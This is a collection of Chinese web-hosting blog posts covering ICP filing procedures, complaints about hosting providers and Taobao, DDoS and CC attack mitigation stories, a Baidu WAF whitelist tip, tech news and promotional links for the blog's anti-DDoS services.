域名证书(如已过期或被他人注册可不提供,需在备案注销原因中写明); 单位有效证件复印件(如:公司营业执照、事业法人证书、组织机构代码证等,须加盖单位公章); 经办人身份证件复印件; 经办人手持单位有效证件的照片。 (2)主体信息为个人的: 已签字的申请表; 域名证书(如已过期或被他人注册可不提供,需在备案注销原因中写明); 个人身份证复印件; 本人手持身份证正面的照片。 以上所有资料请邮寄至吉林省长春市同志街733号,吉林省通信管理局507室,邮编:130061。。如有问题请咨询电话0431-88925397。 6、特别注意: (1)如遇因资料不全等原因退回,请将完整资料一起重新发送。 (2)请使用有效的电子邮箱,我们将核对信息后,将处理结果发送至您的电子邮箱或可登录beian.miit.gov.cn查询结果。 (3)如有问题管局工作人员会联系申请人,若因申请人手机关机或不接听等原因致使通知无法送达超过三次者,申请做放弃处理。 #### 同性恋域名.GAY正式开放注册 新兴通用顶级域名.GAY正式开放注册购买,每年大约342元人民币,不过需要注意的是,.GAY域名禁止有反对/诋毁同性恋意识的站长注册使用。 作为一个新上线的通用顶级域名,.GAY跟其他域名一样,都可以可以用来建站使用,不过因为带有特殊意义跟同性恋相关所以.GAY跟其他顶级域名注册建站,还是有一个很大的不同点,GAY 的域名管理局 Top Level Design特殊规定,.GAY域名不准卖给反对/诋毁同性恋人群或者组织的站长或者公司用来建站使用,发布攻击同性恋群体的相关文章。否则,发现直接停止网站.gay域名解析,禁止访问,保护色彩十分浓重! 另外,在域名费用方面,因为.GAY比较特殊又是刚上线,新用户注册比较贵,大约每年342元人民币,不同注册商价格不太一样(看了几家差异真得很大),续费的话.gay域名每年大约也是收费342人民币,因为是刚出来,炒的比较热,之前也有其他新诞生的域名后缀也曾出现过高价注册现象,后续随着时间的推移,预计.gay价格会逐渐恢复到一般域名水平,有的域名商首次注册.GAY还赠送免费SSL 和2 个 3GB 的免费电子信箱。 主机吧认为gay域名的开放势必会带来一波同性恋网站热,不过国内同性恋网站备案估计是个难题,个人认为这种域名只能当特殊用,投资收益不大。 #### 同性社交软件Blued整改:暂停注册,对未成年人禁用 1 月 7 日讯,据传媒大观察报道, 1 月 6 日,国内最大的同性社交软件Blued通过其官方微博发布公告表示,即日起,软件关闭注册一周,组织技术、算法、AI及内容监管部门开展全面的内容筛查和整治。包括但不限于:冒充成年人的未成年用户;涉及未成年人的文字、图片、群组及其他内容。 据《财新》报道称,Blued在提供服务时,由于没有身份核查机制,年龄可随意填写,导致Blued存在不少未成年人用户,不少未成年用户因使用Blued软件进行交友而感染了艾滋病。与此同时,报道称Blued平台上,还存在着色情、毒品、卖淫等信息。 在整改公告中,Blued表示,今后在注册环节,Blued将设置更加醒目的提示“限制未成年人注册使用的公告,对于所有注册用户,将通过技术及人工手段,优化用户举报流程,加快举报处理速度,对于涉及未成年人使用的情况,坚决注销账号及屏蔽设备。在Blued流量最大的个人资料页等页面,增设固定、可见的防艾提示及宣传入口,后续将会有更多、更深入的改进措施,及时准确的向监管部门、媒体及用户公告,并将建立与媒体对话机制,共商策略,接受社会监督。 Blued官网显示,Blued是目前国内最受欢迎、全球用户总数最多的垂直人群兴趣移动社交应用。截至 2018 年 2 月,Blued已完成D轮(也是成立以来的第 7 轮)融资,拥有全球注册用户 4000 万,其中海外用户占比约30%。据各第三方数据,垂直市场中,Blued市占率超九成。 #### 吐嘈!在淘宝卖虚拟主机VPS的坑逼时光 2017年是主机吧大起大落的一年,开了7年的个人淘宝店在快到皇冠的时候被封了,本以为店铺到了皇冠后可以迎来质的变化,没想到被淘宝当养猪一样杀了。 7年时光,从一个小青年,到快变成大叔,有些话不得不吐嘈。2011年因为一些原因,开始了自己的淘宝店主生涯。那时候淘宝还没有企业店申请,如果开企业店只能上天猫申请,天猫费用高得吓人,所以就只能开个人店铺,万事开头难,主机吧刚开始也是从刷信誉开始的,每天一两单,慢慢刷上了钻石,后来因为容易被删就没有刷了。开始认真经营,经过了几年努力终于快到皇冠了,结果居然被封了,理由是卖违禁品。打电话到淘宝商家热线的时候,咨询对方客服说VPS是违禁品。当时我一听就火了,卖了7年的VPS,居然说是违禁品,各种跟对方客服解释VPS是什么,结果对方一口咬定就是违禁,而且还没有办法申诉,我当时真的呵呵了,国内各网络公司都卖VPS的,难道人家公开违法?! 没办法只能认倒霉,店铺被封后,连旺旺也登不上了,7年客户一下子断了,56千的客户呀,那时绝望了。还好很多客户都是在我们网站注册的用户,业务过期了都是联系方式。然后这边重新开了个企业店,慢慢的把此到新店上。虽然弥补了一些损失,但是损失已经无法弥补,很多老客户找不到我们,联系不上旺旺自然也就丢失了客服。而新店铺根本没有老店铺引流高,这几年这边推广都是用老店铺的外链,损失了好多流量。这个教训告诉我们不要把所有东西都放一个篮子上,要不然这个篮子倒了,你所有的东西也倒了。 其实自从阿里云收购万网以来,主机吧就有预感在淘宝卖虚拟主机类产品活不长,只是没想到淘宝这么绝。我们来说说近几年淘宝无情打压在淘宝IDC行业的事例。 先是虚拟产品不适用天猫为由清退了天猫卖虚拟主机、VPS、云服务器商家。当时在天猫做得比较不错的3A,就是被清退的,估计当时他们很无奈吧。 然后以违法为由封禁了域名关键词,在淘宝搜域名,是搜不到商家内容的,最可笑的是既然域名违法,那为何把阿里云的域名注册服务直接挂到域名搜索上呢? 然后先后封禁了企业邮箱、百度云等关键词,理由还是违法。   然后今年又封了VPS,理由也是违法,但是呢在淘宝搜这些关键词的时候,都是弹出自家阿里云的相应服务!对于到底违不违法我们只能呵呵了。 淘宝还有很多坑B的事情,主机吧就不多说了,免得收到传票,毕竟是国内外公关能力最强的公司。 #### 吐嘈一下华夏名网,一家非常反感的网络服务商 主机吧很多年前就代理有这家公司产品,主机吧当时还是个小站长,做了一个资源站,高峰时期日流量2W+,当时做网站获取流量还是非常简单的,后面因为流量增速太快,而且刚好看到华夏名网的虚拟主机(当时VPS价格非常贵的),就花了200多块钱买了个最便宜的虚拟主机,结果没用多久,网站就被封了。 当时华夏那边说的是通信管局通知的,说是有违法信息,他们查也没查到哪里违法,因为通信管局那下通知的,我也没多想,反正就一个流量站,再做另一个就是了。 然后就打算再做另一个网站,对国内的虚拟主机一顿观察后,还是华夏名网的性价比较高,于是想着干脆拿个代理权吧,反正以后都会用他们空间,还可以卖他们产品,赚点差价,于是就花了1万多块钱拿了他们一个顶级代理,折扣在4折左右,就开始了主机吧长达9年的代理生涯。 当时他们家空间非常大,数据库也大,价格也相对便宜,1G空间2G数据库代理也只需要199元,相当于两百块钱一年,卖得也非常好,主机吧除了做网站外,也就做他们代理卖虚拟主机,一个月也能卖上几十台虚拟主机,收入不大,但是也比打工强。 不过代理他们后,主机吧才发现他们家服务也不是很好,比如说退款,在代理平台下开的空间,是不让退的,为此主机吧曾多次跟渠道专员闹,因为那个时候懂虚拟主机的人很少,售后量非常大,有些用户用得不好就想退款了,而作为代理是没办法退的,这就让主机吧很恼火,因为他们同行都是可以退的,比如西部数码都是7天内可以退,而华夏名网连试用都没有,还不支持退,着实恶心到我了,有时候没办法了,只能自己亏钱退给客户了。 那时他们家售后也非常差,售后烂得离谱,找他们售前客服基本都是解决不了问题的,都是提交工单,工单回复非常慢,半小时内可以回复你就不错了,主机吧记得有一次提交工单,上午提交的,下午才有人回,多次找他们售前客服催,也没人回,当时那叫一个气啊。有时候白天连售前客服都没有,好多次周末找他们的时候,QQ挂着,人都不回消息。当时的国内服务环境确实不好,华夏名网只是其中之一,所以我也没怎么生气,不过他们家服务的差评率确实高,现在只要在百度搜:华夏名网垃圾,还是可以看到一堆差评。 再说他们产品,一开始代理他们产品的时候,主要是卖虚拟主机,因为他们家的虚拟主机确实大,1G空间2G数据库,2G空间2G数据库,总之空间大,数据库也大,很受站长欢迎,用得人多了,问题也就多,比如故障率高,一个月总会有一次不稳定,主机吧都不记得给客户提交了多少次工单了。 当然,那个时候国内网络环境并不好,虚拟主机不稳定很正常,起码没有出现客户数据丢失的情况。 以上都不算什么问题,让觉得问题大的是,随着国内云服务时代的到了,主机吧可以明显感觉到华夏名网正在边缘化,怎么说呢? 他们自己做的云服务器,结果没多久就下架了,出现了客户已购买用户需要转移数据的情况,相当麻烦。 还有虚拟主机配置也出现缩水,以前1G空间2G数据库的配置直接没了,新型号配置降了很多,以前那些已购买的用户,直接给你改配置,导致有时候你都不知道这个主机是啥型号换过来的,客户续遇的时候出现价格高的情况,搞得一头雾水。以前的企业邮箱也直接给停了,有几个用了几年邮箱用户,直接没办法用了,只能改成别家公司的。 那时候主机吧就意识到这家公司用户流失严重了,果然没多久,就发现这家公司开始打主意到代理头上了,主机吧的客户在代理平台充值,因为主机吧帐号上没有足够的钱了,结果被引导到官网,稀里糊涂的就被官方的客服把用户产品直接转官网去了,连招呼都不打啊! 当时主机吧发现后,质问客服,那客服还说是客户主动找他们的,主机吧问了后,才知道是他们在代理平台上设置了链接,一但代理平台有用户充值不是钱,就会引导至官网,让客户直接在官网续,他们帮转过来。就种暗地里抢客户的行为,实在令人气氛,从那此我就对这家公司失望了。 然后主机吧就想着把自己在他们平台上的几个域名转出来去,结果发现,这家公司的域名转出还是N前的方式! 再看他们的备案流程,更无语。 还需要邮寄核验单和上传幕布背景照片。 这种N年前的方法了,还在用,现在绝大多数服务商都是用APP在线操作了,可见华夏名网这些年有多落伍了。 如果有人要买虚拟主机,主机吧不推荐华夏名网,各种原因,主机吧推荐用西部数码、阿里云,这两家都是不错的虚拟主机服务商,尤其是西部数码,虽然近几年用虚拟主机的人少了,但如果让我选心目中国内最佳虚拟主机服务商的话,非西部数码莫属。 #### 吐嘈下小鸟云这家公司:强制用户每三个月改密码 之前写过一篇文章关于小鸟云的,今天再次体会到小鸟云满满的恶意,居然强制帐号每过三个月必须更换一次密码,理由是:为保障您的账号安全,请定期修改密码! 不改密码就不能做任何操作!一个字:操! 我现在连三个月前的密码都忘记了,哪还改得了密码? 我只想说,你以为你是保险柜吗?里面装了几千万资产吗?还三个月换一次。谁这么无聊几个月记一次密码呢?一般都是一个密码没换过,而且现在也有异地登陆手机验证功能。改密码有什么用?改着改着就不记得了,主机吧实在不懂小鸟云是怎么想的,要不是有个客户服务器放在他们家,我连这家公司的名字都不想看到。 如果想要选小鸟云的朋友,要考虑清楚了哈,迟早要被气死! #### 吐嘈!wordpress程序真的烂! 主机吧在建站之初就找过很多开源程序,如织梦、z-bolg、wordress,最后选用了wordpress。没别的比较流行,教程多,免费模板多,酷的模板多。 但当真把网站建成一定规模后,主机吧挺后悔的。下面我列举一些让我无法忍受的事情: 1、没别的,wordpress老毛病,真的慢 前台页如果不开启缓存插件真的慢得离谱,首次加载起码要56秒才可以正常打开。正常用户打开网站3秒打不开就关了,哪有时候等你56秒。主机吧做过优化,选简单的模板,换高性能云服务器,更是把图片全部搬到oss对像存储,最后还是慢,查看了下浏览器加载TTFB,首字节请求时间高达6秒左右,简单的说就是程序运行慢,wordpressPHP运行效率不行。这个很无解,要么用插件把网站全缓存,要么换程序。 2、 wordpress模板对IE浏览器兼容不好 wordpress模板很多,但能够全面兼容IE浏览器,谷歌浏览器的,又好看的模板基本很少。也许玩wordpress的大神都是追求极致的人,像IE这种低端浏览器根本看不上。追求炫酷本来就要牺牲很多,这个可以理解,但对于追求体验的网站来说,极简才是最重要的,这也导致主机吧认为wordpress并不适合大多数站长玩。 3、搜索引擎收录不友好 如果认真的对比一下,你会发现,使用wordpress系统建站的搜索引擎收录并不是很友好,特别是360搜索引擎,主机吧建立快半年了,360搜索引擎就只收录首页,主机吧认为原因可能是前面两个的因素,程序打开慢,导致360索引慢,也就降低了蜘蛛爬虫的积极性。也可能是兼容性不好,主机吧网页IE浏览器访问时会出现错位的情况。这个问题这边也没办法解决,因为模板不是这边开发的,换模板的话估计影响其它搜索引擎收录,所以一直没更换,就一直错下去了。   主机吧也曾想过换成z-bolg程序,查找了下网上教程,wordpress转成z-bolg会损失很多东西,最起码文章绝对路径一定会更改,这样的话,努力了大半年的收录会化为泡影,所以忍了。 wordpress程序很强大,可以实现很多类型的网站效果,但带来的也会越来越肿,运行效率低下,已经不适合专注博客的网站了。   #### 吐嘈!使用阿里云CDN遇到的一些坑事! 最近有幸接手一个客户网站,帮助其修改网站内容,结果因为客户使用的阿里云CDN心态爆炸。也许是主机吧用习惯百度云加速了,导致使用阿里云CDN的时候出现很多问题。一、网站刷新缓存很困难主机吧在改网站的时候,本地测试正常的,换上阿里云节点后,网站就出现问题了,然后主机吧就到阿里云CDN管理刷新缓存,结果刷了半天也不生效。原来他们的CDN是没办法直接全站刷新缓存的,静态资源如果设置了缓存规则的话,得单独刷新才行,主机吧就是因为刷存了CSS文件,导致一直没更新过来。二、CDN支持动态感觉很差开启阿里云CDN后,网站就出现会员登陆不上,PHP请求超时504现象, 主机吧查看了下CDN并没有设置有设置动态文件缓存,而阿里云CDN是默认把所有文件都缓存了,很是麻烦。三、售后真的脑瓜疼遇到问题这边多次提交售后问题让阿里云官方查看,结果官方售后让我检查缓存策略,回答也是机器性回答,根本不帮调整,最后还让我直接回源测试,我就是回源没问题才找他们的,结果他们又让我回源,真的没法沟通。到最后也没解决问题,然后这边让客户换成百度云加速的了,半小时就搞定了。也许是主机吧经手阿里云CDN不多,操作不当,或许是阿里云CDN并不支持动态网站,而阿里云的售后真的很难受,总之搞得脑瓜疼。 #### 吐嘈!华夏名网快速注销客户备案号 说起华夏名网,主机吧现在只能觉得恶心,为何?以前做他们代理,给他们卖了很多产品,不过近几年他们不行了,也不给代理折扣了。 主机吧以前在他们那买产品的客户还有一大堆,结果现在钱没赚,还得每年给他们产品做一些售后,本来吧也没什么,就当养用户好了。 结果最近我一客户因为域名过期了,没通知上续费,备案号没到10天就要被注销,这就很恶心了。 从上图可以看到域名3月13过的期,3月22号就要被取消备案接入。 这个问题只是其中之一,这些年主机型号换了又换,客户本来是linux系统,给人家换成了win系统,导致客户网站很多不兼容。还有以前备案过的用户还得重新提交资料在他们系统备案过,有些客户连电话都换了根本更改不了备案接入,客服现在也爱理不理的,如果不是有时候还通知我续费,我都以为这公司要倒了。这些年阿里云腾讯云两家云服务商在国内的占有率越来越高,国内很多中小型服务商都有快倒的趋势,有些甚至都不做国内业务了,直接转做海外业务去了,而华夏名网也走起了代理线路先后代理景安、华为服务器,虽说勉强可以存活,不过已经没有多大发展了,如果大家有业务要选的话主机吧推荐除了阿里云、腾讯云外,西部数码、景安网络这些都是不错,有实力,而且有自己的优势,不至于被阿里云腾讯云这些大厂商冲击倒闭。 #### 吐嘈!备案真的耽搁网站建设效率! 从主机吧打算新做一个网站到提交备案,等待审核,目前已经过去8天了!目前还不清楚备案审核要多久,这8天里真的耽搁了很多网站建设中的一些琐事。 今天主机吧就来说说被备案耽搁的一些事。 1.域名绑定 由于需要备案才可以绑定国内主机,因此在没有备案通过的这段时间里,想要搭建网站绑定域名的测试效果的目的是无法实现了,主机吧目前只能用别的域名绑定主机吧临时用一下,但由于是临时域名,目前不太敢添加太多内容,怕到时需要修改很多东西。 2.SSL部署 因为域名一直没上线,所以一直没申请SSL证书,主机吧打算申请SSL证书收费的SSL证书,兼容性好些,现在申请SSL证书就浪费时间浪费钱了。 3.网站资源修改 目前主机吧一边申请备案一边用别的域名临时搭建网站,但由于用临时域名,以后需要改回备案域名相当麻烦,比如网站中的图片URL,目前添加全是临时域名的URL,还有LOGO地址也是,等域名备案通过后估计还得大量修改,而且网站本来打算用云储存的,因为没备案也耽搁了。 4.不能做推广 主机吧这段时间已经把网站做好了,就等着域名备案通过后,上线推广了,现在这一耽搁,估计以后有得忙了,得添加各站长平台,还有百度统计等等,都非常影响。 5.影响打包PWA 一直想把网站打包成PWA应用,但因为域名用的是临时的,所以一直在等。 总之,感觉这备案太慢了,如果备案一两天审核通过还好,这一个星期两个星期就实在太影响网站运营进度了,一家公司可能因为备案的审核时间过长,导致损失严重。 这么多年了,备案还是这样,备案早就应该实现自动化了,而不是人工审核,人工审核实在太慢了! #### 吐嘈!小鸟云,交了一次智商税 主机吧最近遇到一件让我觉得很恶心的事情,小鸟云,这家公司让主机吧交了一次智商税。原因是这样的,前几个月主机吧因客户需求就代理商小鸟云了。当时没怎么注意小鸟云的代理政策,这是我在国内见过代理最奇葩的,代理居然要收钱,而是收880元。这是在国内其它服务商完全没有的。其它服务商基本都是让你预存个几千块钱就可以代理了。恩,这样一看,看觉小鸟云好高端……一开始主机吧以为可以像阿里云腾讯云那样关链代理商帐户,以后续费升级都会有相应的折扣,结果后来主机吧帮客户续费的时候才发现,根本没这回事,小鸟云就给了优惠券,那优惠券的价格也就8.5折。而且还是只能新购可以用,续费根本没法用的,只能按照官方价续。这完全是GPS会员嘛,哪是什么代理。而小鸟云的GPS也是奇葩,居然只对新用户有用。就这政策还收880元的费用!腾讯云阿里云都是免费开通的。所以说好坑!做为混迹互联网多年的老人,主机吧着实交了一把智商税……再说小鸟云的产品,基本上使用小鸟云的网站都是冲着高防去的吧。但大家知道吗? 小鸟云的产品对CC攻击基本是上没什么用的,防御策略就是限制同一个IP一分钟内访问多次而以。也就是他们应对CC攻击只提供基本的防护策略。主机吧试过了一个免费的CC攻击软件都可以把小鸟云的服务器搞爆,基本不需要成本。主机吧曾问过官方客服,他们也说不防CC,那所谓的高防服务器就没什么用了。因为目前一半以上的攻击都是CC攻击。而CC攻击其实也是DDOS攻击的一种,基本上提供高防的公司都是会有防护CC攻击的。但小鸟云也给我们上了一节智商课,恩,CC攻击不是DDOS。而且小鸟云的云服务器价格都比同行贵些的,大家可以对比下群英亿速云,这些提供高防的公司,基本同配置上都比小鸟云便宜很多。小鸟云的服务器速度也不怎么样,速度一般般,主机吧客户宽带4的配置,打开一个普通的页面却要3秒以上,完全没有优势可言。再说小鸟云售后,现在一般比较正规的服务商都是会提供7天24小时售后服务的。小鸟云官网上也打着7天24小时售后服务,官方技术24小时售后服务这边不大清楚,毕竟主机吧没有半夜提交过工单,但是企业QQ根本没有24小时售后,甚至周末都没人在。主机吧已经不只一次在周末想联系在线客服都找不到人情况了。所以说,小鸟云什么7天24小时售后服务,又一次智商压制。最后主机吧想说的,主机吧心里已经把这家公司拉下黑名单了,以后产品决不会在买小鸟云的产品! #### 吐嘈!百度云备案速度真的慢! 之前有写过主机吧打算域名备案转入百度云文章,本来主机吧以为像百度这样的大公司备案效率应该很快的,结果先的备案系统用不了,整整半个月没办法备案,再到备案初审核,也就是百度审核备案,已经提交备案资料审核整整一周过去了,备案审核完全没动静。   主机吧提交了好几个工单,回复都是请耐心等待。 加上之前就一直觉得百度云虚拟主机简直就是坑,运行个小网站都运行不了。目前主机吧备案转入整整花了快一个月了,还没有审核。我们都知道域名备案如果一个月内没有转入备案的话,原空间商可能会对域名备案号进行注销,从而导致无法正常访问。所以主机吧才会这么急着催百度云审核。结果效率真的慢,看来百度云真的跟阿里云、腾讯云实力有很大的差别。   #### 吐槽下一次新增网站备案头疼的经历   最近主机吧打算做一个新项目,需要网站备案,说起备案真的是一件头疼的事,不管是过去备案还是现在备案。 要知道以前备案是需要邮寄核验单还有现场拍照的,非常麻烦,本以为过了这么多年了,国内的备案审核应该方便很多的,结果还是相当麻烦,下面主机吧就来说下这边新增备案的经历: 主机吧是在腾讯云备的案,相比以前要现场拍照核验单填写之类的,现在确实方便多,填写资料都是在小程序上填的,拍照也是用手机直接拍就行了,只要找到一面背景白色的拍就行了。 但是,现在备案审核相比以前要严格很多,主机吧就遇到几个问题。   身份证更换过,还有营业执照更换过 因为是多年前备案的了,新增备案肯定也是用之前的备案号的,但是我本人身份证更换过的,还有营业执照也修改过的,所以还要先修改主体,重新上传新的资料,这就无形中增加了审核时间了。 2. CC域名还得重新实名 由于一段时间CC不能备案,导致之前的实名不能用了,还得重新实名,又增加了3天审核时间。 3. 新注册域名实名认证通过后三天内不能备案 这又是一个奇葩规则,就是新注册的域名要实名,而实名三天内不能进行备案,又增加了三天 4.主体备案号下的网站必须正常打开,并挂有备案号和链接工信部网站 主机吧营业执照下总共备了7个网站,结果腾讯云有3个打不开,一个要求挂备案号和工信部网站链接。其实那三个网站都是可以打开的,只是估计网络比较差,腾讯审核的时候网络打不开。这就导致了这边要给那三个网站加CDN,还要修改网站页面,挂个工信部网站和备案号,这又增加了备案工程。 5. 备案需要有一个紧急联系电话 这个规定其实对一些个人站长来说是非常不友好的,因为你需要另一个电话号码才行,常用号码不能用,必须有一个紧急联系电话码号,否则无法备案。 当然如果有亲戚朋友帮忙的那倒没什么问题。 以上就是主机吧提交 了两次备案遇到的问题,目前还只是审核主体信息变更就遇到一堆麻烦事了,已经差不多一周了,还在原地踏步,想想等新增备案完了估计没有个把月下不来了。总得来说国内备案体验非常差,审核进度非常慢,各种规定卡得很死,你不做根本通不过备案,怪不得现在做网站的人越来越少了,实在备案难呀,反而肥了那群搞境外服务器的。     #### 向日葵远程因“数据库异常”挂了 根据搜索结果,贝锐向日葵远程控制崩溃的原因是由于数据库异常,导致部分用户出现设备列表加载异常,发起远程异常情况。 目前,贝锐向日葵的工程师正在紧急修复这个问题,他们建议用户将设备保持在线状态,以便在修复完成后自动恢复。 贝锐向日葵是一款远程控制软件,用于 IT 运维、远程办公等,号称连接远控设备数超 5 亿,服务企业客户数超 70 万,国内很多企业运维都用这款软件。 #### 向日葵:一款非常好用的远程协助软件 经常使用电脑的小伙伴都知道,有很多东西不懂的是需要进行大能远程协助的,而QQ也可以进行远程协助,不过QQ的远程协助是非常卡的,而且不好用,但向日葵却非常好用,反应快,操作简单,只需要把本机识别码发给别人,等对方申请远程你再接受就可以了,非常方便,推荐给大家使用。 官方下载地址:https://sunlogin.oray.com/download #### 吓坏资本市场,杭州市马某某被国安局抓,马云中枪! 今天一早,一条关于“杭州国家安全局上个月对马某某采取刑事强制措施,马某涉嫌利用网络从事危害国家安全活动”的消息突然登上各大媒体头条。 据央视新闻客户端消息,2022年4月25日,杭州市国家安全局依法对勾结境外反华敌对势力,涉嫌从事煽动分裂国家、煽动颠覆国家政权等危害国家安全活动的马某某采取刑事强制措施,目前此案正在深入调查中。受市场猜测的影响,阿里巴巴一度跌超9%,京东集团跌超8%,小米集团跌超6%。恒生科技指数一度重挫超4%。 随后,胡锡进在微博上发文称:“据老胡向权威部门确认,杭州市国家安全局抓的是‘马某某’,不是‘马某’。写‘马某’的报道都是不准确的。” 随着市场疑虑的消除,以阿里巴巴为首的科技股开始反弹,截至发稿,阿里巴巴跌幅收窄至0.78%,小米集团跌3%,京东集团跌4%。 今日恒指盘中成功翻红,此前股指低开后经历短暂跳水,一度跌2%。阿里巴巴-SW(09988)一度下跌超9%。同时,恒科指也从-4.4%收窄至-0.5%左右。 蓝筹股表现上,内房、金融等板块领涨,香港地产、消费等板块领跌。 截至发稿,美团-W(03690)涨1.92%,报175.30港元;香港交易所(00388)涨2.72%,报347.00港元;下跌方面,阿里巴巴-SW(09988)跌0.78%,报101.3港元;长和(00001)跌2.26%,报53.95港元。平安证券在5月港股策略月报中表示,“支持平台企业健康发展”的提出带动互联网板块显著反弹,后续进一步的具体支持举措也将会继续推动港股互联网板块的估值修复。而在地产调控举措的逐步趋松下,金融地产板块的估值修复也值得关注。 #### 启用百度云加速后移动访问网站时无法识别手机页解决办法 最近在群里看到一位同学反馈网站启用百度云加速后,无法识别移动端访问,打开的是PC端的页面 对于这个问题可能是客户启用了HTML压缩所致,我们只需要进入CDN加速功能, 智能压缩  把智能压缩HTML关了再查看即可。 如果还是不能解决的话,我们可以启用移动端跳转功能,功能在其它-移动端跳转 看提示设置即可 #### 启用百度云加速后网站采集用不了原因 最近有客户反馈网站使用百度云加速后,网站采集功能用不了,这里我们分析下原因: 查询后发现客户开启了强力防护模式以及超级清洗中心,直接关掉即可。 开启两个功能后会使客户端访问网页显示代码为503,这是百度的一种安全检测,是会拦截掉一些采集的功能,只需要关掉即可。 #### 启用百度云防护web防火墙后,网站上传东西会被拦截解决办法 最近,有位客户反馈,网站会员上传东西会被当成入侵误拦截。 主机帮查了下,发现上传功能会命中一个名为Cross_site.XSS.L的安全规则。 解决办法其实很简单,利用白名单功能把上传功能的URI路径加白就行了。 操作如下: 进入Web防护规则-创建web防护规则(如已创建有防护规则的直接修改已关联的规则就行了) 找到白名单功能,开启并添加白名单 策略名称:上传功能白名单 匹配字段:URI 逻辑符:前缀匹配 匹配内容:/FlexPaper/Uploadify/ 不检测模块全选 点确认。然后状态开启。 再保存防护规则。 然后我们记得要关联实例。 如果已经关联过了就不需要操作了。 如果你不知道自己程序上传功能的文件路径可以进入百度云防护的攻击日志-Web攻击防护,找到之前被拦截的记录,查看详情即可知道攻击路径了。 #### 吾爱课堂付费课程网疑似跑路了 最近,站长圈内有多名站长反馈,吾爱课堂(52kt.net)疑似跑路了,客服删好友了。 原因可能是与侵权有关,因为该网站一直是出售盗版付费课程的。 主机吧看了下,很多站长都在这个网站购买过会员,甚至有花699购买的永久会员,这网站稳定运营了两年多,这得赚钱多少钱哈。这几年很多付费教程类的网站崛起,由于很多都是盗版的资源,所以根本不需要什么成本,有些网站设置可以做到月入十万+,收入相当可观。不过,今年由于经济环境不好,很多公司开始对侵权下手了,很多网站被迫关闭,甚至面临赔偿。所以,各位站长要小心了,有侵权风险的东西就别碰了。 #### 周末又一客户网站遭到频繁CC攻击 今天,一早主机帮就收到百度云防护大量短信提醒,有网站遭遇CC攻击。 主机帮登陆后台查看了下,攻击频率相当高,几乎是每10分钟攻击一次,每次攻击时间也不长。 攻击量非常低 从数据上看,同行攻击,购买的攻击量很低,但这种攻击时间特别长,从早上8点55攻击到现在11点快12点了,都没有停下来的迹象。 如果客户在没有部署百度云防护的情况下,网站会出现卡顿,甚至打不开的情况,而这种情况是持续性的,按攻击时间来算的话,那长达3个小时出现卡顿甚至打不开的情况,对于网站来说是非常伤的,这也是竞争对手想要达到的效果。 还好客户已经部署了百度云防护,百度云防护支持网站加速、CC攻击拦截、DDOS防御、漏洞拦截等功能,可以有效保护网站安全,有需要的同学可以了解下:https://zhujib.com/shop/26864.html #### 周末客户网站被DDOS攻击超300G的防御经历 上周,主机帮这边一个购买高防IP防御服务的客户网站遭遇了超200G的DDOS攻击,导致高防IP被连续封禁。 由于连续的超量攻击,使得高防IP刚恢复就被封禁,被机房延长了解封时间,解封时间高达半小时,对客户业务造成了严重影响。 晚上11点左右更是攻击超过了300G! 为此,主机帮认为升级更高防御意义不大,第一个更高防御价格贵,第二个黑客可能可以打更高的量。 所以,在主机帮的建议下,我们采用了容灾切换模式,采用多个高防IP进行备用切换,当主高防IP被攻击超量后,就自动切换成另一个备用高防IP,虽然攻击切换IP还是有短暂的影响,但影响不大,可以尽量减少损失。 这里我们需要用到两个高防IP(也可以买多个,看自己预算)和腾讯云的智能全局流量管理 IGTM功能。 通过腾讯云IGTM检测两个高防IP的可用度,当检测到一个高防IP不可用后,IGTM会自动切换至可用的高防IP上,最大限度提高网站可用度。 目前,已经成功部署,黑客没有再进行攻击,期待后期效果。 #### 周末百度云防御CC攻击事件 今天一早,收到百度智能云短信提醒,一位客户的网站遭遇了CC攻击。 主机吧赶紧登陆客户网站查看,是否正常,看是否需要通知客户。 结果打开正常,看情况并没什么影响,那就等攻击结果了再看吧。 下午的时候,登陆百度云防护查看攻击日志,发这位客户的网站还挺多黑客扫描的,还好百度云防护拦截了。 再登陆查看CC攻击 整个过程序攻击了5分钟左右 百度云防护拦截了99%的攻击,效果不错。 像这次只是一个中小型的CC攻击,但却让人防不胜防,因为属于周末,而且在早上,一般的公司网站运维人员都不在,如果服务器被攻击挂了,极有可能会长时间无人发现,导致网站长时间无法打开,影响业务,甚至可能影响百度收录排名,攻击者估计就是为了这个目的攻击。 还好客户使用了百度云防护进行防御,百度云防御就是为了预防这类突发性攻击的,我们不要等到被攻击了才上防御,到那时已经晚了。 #### 周末高防IP自动拦截每秒5万次恶意CC攻击事件 前几天帮客户APP成功拦截了某大型CC攻击,然后对方看到攻击不下,消停了几天。 没想到趁着这个周末对方又来攻击了,这次攻击比以往的还要大,达到每秒5万次攻击。 每分钟来恶意请求数达69万次 大家可别小看这攻击量,这攻击量已经属于大型CC攻击了,放在百度云加速统计那都是上亿峰值了,最后主机吧高防IP还是稳稳防下来了,客户甚至没有一点感觉,如果不是主机吧查看报表都不知道今天有被攻击过。有需要高防IP的站长可以咨询,套餐价格地址:https://item.taobao.com/item.htm?ft=t&id=571663483512 #### 周鸿祎开炮开源软件 :存隐患 将面临“平时被控、战时被瘫痪”风险 3月30日消息,周鸿祎今日在微博发布关于开源软件态度的长文,周鸿祎表示,如果开源软件有了立场,我们将直面 “平时被控、战时被瘫”的现实风险。在今年两会上,周鸿祎关于开源软件的提案里也指出,开源软件由于生态开放,存在着大量的安全漏洞等风险。 就在俄乌冲突期间发生的一件事情引发我们对开源软件的关注。俄罗斯程序员开发的高性能的HTTP和反向代理web服务器Nginx由于创始人在美国创办了Nginx Inc公司,该公司2019年被美国F5收购。近期,Nginx母公司F5发文宣布:暂停在俄罗斯的所有销售业务,并禁止俄罗斯对Nginx开源项目作贡献。俄罗斯人创立的Nginx反而成了西方制裁俄罗斯的工具。 当前,国内软件开发虽然正在快速发展,但是尚未形成具有国际影响力的自主开源项目,我国银行、能源、国防、医疗、电力等重要行业运行的系统,大量使用的为国际开源软件。所以,周鸿祎强烈呼吁国家以关键信息基础设施保护为抓手,加强我国开源软件安全。 以下为周鸿祎观点全文: #### 和谷歌搜索对着?华为搜索曝光,已在海外开启测试 3月2日 消息:近日,有媒体报道称华为搜索(HUAWEI Search)App现已在海外测试上线,据称这是华为 HMS (Huawei Mobile Services)生态的一部分。 据报道,华为搜索预计很快将登陆华为应用商店AppGallery,需安装华为移动服务(HMS)的最新版本方能使用。 根据安装界面显示,华为搜索App“快速答案激发您的灵感和探索世界的兴趣,以最佳的本地化为您提供智能服务”。据称,华为搜索目前只提供网页、图片、视频、新闻和本地内容搜索功能,以及为用户提供“反馈”功能。 